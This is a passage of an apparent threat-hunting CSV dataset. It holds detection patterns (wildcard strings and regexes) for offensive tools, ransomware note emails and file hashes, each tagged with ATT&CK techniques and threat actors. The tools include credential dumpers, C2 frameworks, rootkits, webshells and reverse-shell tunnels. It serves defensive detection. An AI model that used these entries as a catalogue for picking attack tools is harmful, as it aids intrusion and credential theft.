"*derdiarikucisv@gmx.de*",".{0,1000}derdiarikucisv\@gmx\.de.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40751" "*deritim@proton.me*",".{0,1000}\""deritim\@proton\.me\"".{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes 
archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","#email","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40752" "*Description'>IE Passwords Viewer*",".{0,1000}Description\'\>IE\sPasswords\sViewer.{0,1000}","offensive_tool_keyword","IEPassView","IE PassView scans all Internet Explorer passwords in your system and display them on the main window.","T1555 - T1212","TA0006","N/A","BlackSuit - Royal - GoGoogle - XDSpy","Credential Access","https://www.nirsoft.net/utils/internet_explorer_password.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40755" "*DesertNut.csproj*",".{0,1000}DesertNut\.csproj.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40758" "*DesertNut.exe*",".{0,1000}DesertNut\.exe.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40759" "*DesertNut.sln*",".{0,1000}DesertNut\.sln.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40760" "*DesertNut_h.cs*",".{0,1000}DesertNut_h\.cs.{0,1000}","offensive_tool_keyword","DesertNut","DesertNut is a proof-of-concept for code injection using subclassed window callbacks (more commonly known as PROPagate)","T1055.012 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tool","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/DesertNut","1","1","N/A","N/A","N/A","10","1131","203","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z","40761" "*Desktop\AutoCrypt_Password.txt*",".{0,1000}Desktop\\AutoCrypt_Password\.txt.{0,1000}","offensive_tool_keyword","AutoPwnKey","red teaming framework and testing tool using AutoHotKey","T1059.007 - T1204.002 - T1564.004 - T1105 - T1087 - T1069 - T1027 - T1218 - T1548.002 - T1547 - T1056.001 - T1021.001 - T1102 - T1573 - T1499 - T1565","TA0001 - TA0007 - TA0005 - TA0004 - TA0003 - TA0006 - TA0008 - TA0011 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CroodSolutions/AutoPwnKey","1","0","N/A","N/A","10","1","25","5","2025-04-11T21:52:48Z","2024-08-14T05:05:33Z","40763" "*DESKTOP-PRINTINGFUN\*",".{0,1000}DESKTOP\-PRINTINGFUN\\.{0,1000}","offensive_tool_keyword","IPPrintC2","PoC for using MS Windows printers for persistence / command and control via Internet Printing","T1090 - T1133 - T1547.012 - T1572","TA0011 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/Diverto/IPPrintC2","1","0","N/A","lolc2","10","10","146","20","2024-05-03T11:13:38Z","2024-05-03T09:13:10Z","40764" "*-destPipe * -pipeHost * -bindPort *",".{0,1000}\-destPipe\s.{0,1000}\s\-pipeHost\s.{0,1000}\s\-bindPort\s.{0,1000}","offensive_tool_keyword","invoke-piper","Forward local or remote tcp ports through SMB pipes.","T1003.001 - T1048 - T1021.002 - T1021.001 - T1090","TA0002 -TA0006 - TA0008","N/A","N/A","Lateral 
Movement","https://github.com/p3nt4/Invoke-Piper","1","0","N/A","N/A","N/A","3","295","51","2021-03-07T19:07:01Z","2017-08-03T08:06:44Z","40765" "*Destroying all droplets*",".{0,1000}Destroying\sall\sdroplets.{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","Black Basta","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","N/A","10","1","49","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z","40766" "*details-c80a6994018b23dc.js*",".{0,1000}details\-c80a6994018b23dc\.js.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","40768" "*detect ntdll.dll*",".{0,1000}detect\sntdll\.dll.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40769" "*Detected a Windows Server version not compatible with JuicyPotato*",".{0,1000}Detected\sa\sWindows\sServer\sversion\snot\scompatible\swith\sJuicyPotato.{0,1000}","offensive_tool_keyword","RemotePotato0","Windows Privilege Escalation from User to Domain Admin.","T1078.002 - T1078.003 - T1078.004","TA0004 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/antonioCoco/RemotePotato0","1","0","#content","N/A","10","10","1382","215","2022-12-18T01:52:53Z","2021-02-08T22:02:19Z","40770" "*Detected possible phantom shell command*",".{0,1000}Detected\spossible\sphantom\sshell\scommand.{0,1000}","offensive_tool_keyword","TripleCross","A Linux eBPF rootkit with a backdoor - C2 - library injection - execution hijacking - persistence and stealth capabilities.","T1055 - T1021.005 - T1055.011 - T1055.003 - T1547 - T1574 - T1027 - T1070.004 - T1562.001","TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/h3xduck/TripleCross","1","0","#linux #content","N/A","10","10","1838","232","2024-04-07T02:06:19Z","2021-10-27T17:47:58Z","40771" "*detect-hooksx64.*",".{0,1000}detect\-hooksx64\..{0,1000}","offensive_tool_keyword","cobaltstrike","Proof of concept Beacon Object File (BOF) that attempts to detect userland hooks in place by AV/EDR","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - 
LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/anthemtotheego/Detect-Hooks","1","1","N/A","N/A","10","10","158","30","2021-07-22T20:13:16Z","2021-07-22T18:58:23Z","40772" "*dev.l1qu1d.net/wraith-labs/wraith*",".{0,1000}dev\.l1qu1d\.net\/wraith\-labs\/wraith.{0,1000}","offensive_tool_keyword","wraith","A free and open-source, modular Remote Administration Tool (RAT) / Payload Dropper written in Go(lang) with a flexible command and control (C2) system.","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/wraith-labs/wraith","1","1","N/A","N/A","10","10","223","49","2023-12-03T22:16:27Z","2020-01-23T17:09:23Z","40774" "*dev-2null/ADCollector*",".{0,1000}dev\-2null\/ADCollector.{0,1000}","offensive_tool_keyword","ADCollector","ADCollector is a lightweight tool that enumerates the Active Directory environment","T1087 - T1018 - T1069 - T1482","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/dev-2null/ADCollector","1","1","N/A","N/A","7","7","629","81","2022-07-30T05:27:15Z","2019-05-15T06:42:20Z","40775" "*DEV-COBBR\\TestAdmin*",".{0,1000}DEV\-COBBR\\\\TestAdmin.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","40776" "*Device architecture unknown. Download cloudflared/loclx manually*",".{0,1000}Device\sarchitecture\sunknown\.\sDownload\scloudflared\/loclx\smanually.{0,1000}","offensive_tool_keyword","CamHacker","Camera phishing tool. If anyone opens link generated by CamHacker and permits camera access his/her photo will be captured!","T1598 - T1204 - T1566.001","TA0009 - TA0010 - TA0043","N/A","N/A","Phishing","https://github.com/KasRoudra/CamHacker","1","0","N/A","N/A","10","","N/A","","","","40777" "*devine@cr0.net*",".{0,1000}devine\@cr0\.net.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","0","#email #linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","40779" "*df00930aa6c14a657802dcc5f6d397038ae4c8206bfef8a810a6fa7530fc6521*",".{0,1000}df00930aa6c14a657802dcc5f6d397038ae4c8206bfef8a810a6fa7530fc6521.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40786" "*df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f*",".{0,1000}df022228501cd23496cd0e6c761d31ccb8b754032f27e2c78a8b1447bc8f512f.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","40787" 
"*df0be334160f7fbd522056f8944947f228aa93479fe3981c84a221d2cd733ddc*",".{0,1000}df0be334160f7fbd522056f8944947f228aa93479fe3981c84a221d2cd733ddc.{0,1000}","offensive_tool_keyword","WCE","manipulates and extracts credentials through NTLM - Kerberos and Digest Authentication","T1003 - T1550.003 - T1555.003 - T1557.001 - T1557.002 - T1078 - T1212","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/returnvar/wce","1","0","#filehash","N/A","10","2","109","21","2019-09-15T05:26:40Z","2019-01-10T04:10:48Z","40789" "*df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc*",".{0,1000}df110ed12c12b69bd7791fccb00ecb9ef8eb38f694fb8252cb9d55590362d8fc.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","#filehash","N/A","10","10","2231","405","2025-04-21T03:17:20Z","2017-04-05T17:05:10Z","40790" "*df117b05c21cd8ef0c6c4d85290d81532838e4645677bdb2955a968eba9da682*",".{0,1000}df117b05c21cd8ef0c6c4d85290d81532838e4645677bdb2955a968eba9da682.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","40791" "*df13fa4302b5994f61271abcf3bfbb9c7c4cf881dbc6631735916fe3ca891043*",".{0,1000}df13fa4302b5994f61271abcf3bfbb9c7c4cf881dbc6631735916fe3ca891043.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation 
tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","#filehash","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","40793" "*df1d68f681e71e7c78c734a467a4aa7d968c1bb11760868b13d93ffa7f65a0c0*",".{0,1000}df1d68f681e71e7c78c734a467a4aa7d968c1bb11760868b13d93ffa7f65a0c0.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","40795" "*df2bd01c22fd9c3bbcb01f8945a7b70d2c5b3d48dcd47ecb1e44a46ca47cd67c*",".{0,1000}df2bd01c22fd9c3bbcb01f8945a7b70d2c5b3d48dcd47ecb1e44a46ca47cd67c.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","40800" "*df31292f5844d7a8c8ea8c37704d23b28b8598449cda50b6cae9e85614277977*",".{0,1000}df31292f5844d7a8c8ea8c37704d23b28b8598449cda50b6cae9e85614277977.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40801" 
"*df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb*",".{0,1000}df32f865014710359e52fcf0ba175ad479fec41cde92dc8dc4b7524145121ceb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40802" "*df354b2e87294f8b650fc5f43b3f4ec1ac2aa193e5d67f63a42887f77fa1aad5*",".{0,1000}df354b2e87294f8b650fc5f43b3f4ec1ac2aa193e5d67f63a42887f77fa1aad5.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1059.001 - T1078 - T1086 - T1021.002 - T1046","TA0008 - TA0003 - TA0004 - TA0005 - TA0006 - TA0009 - TA0010 - TA0011","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","0","#filehash","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","40804" "*df35838ff39fcb2ec8c8783b4485abe8b7cd805bad795caf730e6886e48655a1*",".{0,1000}df35838ff39fcb2ec8c8783b4485abe8b7cd805bad795caf730e6886e48655a1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40805" "*df3adfbca15691d22d9dd17b3247e1ef434b0b85863ce1e6900565cdbf8b1cd4*",".{0,1000}df3adfbca15691d22d9dd17b3247e1ef434b0b85863ce1e6900565cdbf8b1cd4.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU 
Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","40808" "*df3f055a2fe6f5b84cc062ba3576864810034bf5e5f04235356374b6e725f8bc*",".{0,1000}df3f055a2fe6f5b84cc062ba3576864810034bf5e5f04235356374b6e725f8bc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40809" "*df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef*",".{0,1000}df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40810" "*df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301*",".{0,1000}df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","40814" 
"*df64eaddeb2763b35b10a754df7492a2d305fdd8873d847e271e48c6ede05783*",".{0,1000}df64eaddeb2763b35b10a754df7492a2d305fdd8873d847e271e48c6ede05783.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40816" "*df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d*",".{0,1000}df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40817" "*df68fb1553a6d135354adb6d2cc68ea5b0b63569e8d2c6bf5659869cf94ae4cc*",".{0,1000}df68fb1553a6d135354adb6d2cc68ea5b0b63569e8d2c6bf5659869cf94ae4cc.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","40818" "*df6b380384faa29656ef09665f3ce25b350fb22712230f0abd8a79739218db15*",".{0,1000}df6b380384faa29656ef09665f3ce25b350fb22712230f0abd8a79739218db15.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. 
The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","40819" "*df715721574b532f4f6afea2a3864a11d7d2ce94872267f640d688a34d0d0625*",".{0,1000}df715721574b532f4f6afea2a3864a11d7d2ce94872267f640d688a34d0d0625.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","40820" "*df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0*",".{0,1000}df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40822" "*df78d4f9127039231844797c38428df24a80bd49eb11a5ee9a4dcf43f31573a9*",".{0,1000}df78d4f9127039231844797c38428df24a80bd49eb11a5ee9a4dcf43f31573a9.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40823" "*df8687a87b12b4cfcd9cad7082ed7c92bb43726b0d026aeeae6efd575539c0e8*",".{0,1000}df8687a87b12b4cfcd9cad7082ed7c92bb43726b0d026aeeae6efd575539c0e8.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","40825" "*df8ef60e1804137b954c9ca3f896887789d33fcf3c24ea31db30a18443370539*",".{0,1000}df8ef60e1804137b954c9ca3f896887789d33fcf3c24ea31db30a18443370539.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - 
TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40827" "*df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f*",".{0,1000}df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#filehash","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","40828" "*df9860d2c8cecab1cdb3ea0367184c4e486ae8db5661784f94d5bed0736703e3*",".{0,1000}df9860d2c8cecab1cdb3ea0367184c4e486ae8db5661784f94d5bed0736703e3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40829" "*dfa3434845774ae53b7a2b3396c31a7478f7fa8b1601b8b9f8600a647f7b492d*",".{0,1000}dfa3434845774ae53b7a2b3396c31a7478f7fa8b1601b8b9f8600a647f7b492d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40830" "*dfb104a4f9541ef50c36e26d50379b2cfde93bb28bf1136aa84f917431bc2431*",".{0,1000}dfb104a4f9541ef50c36e26d50379b2cfde93bb28bf1136aa84f917431bc2431.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - 
T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40831" "*dfb60195257e88b1874fe4b859819a377898a3e3fa4fdaefb13010947c2b415a*",".{0,1000}dfb60195257e88b1874fe4b859819a377898a3e3fa4fdaefb13010947c2b415a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40834" "*dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46*",".{0,1000}dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master 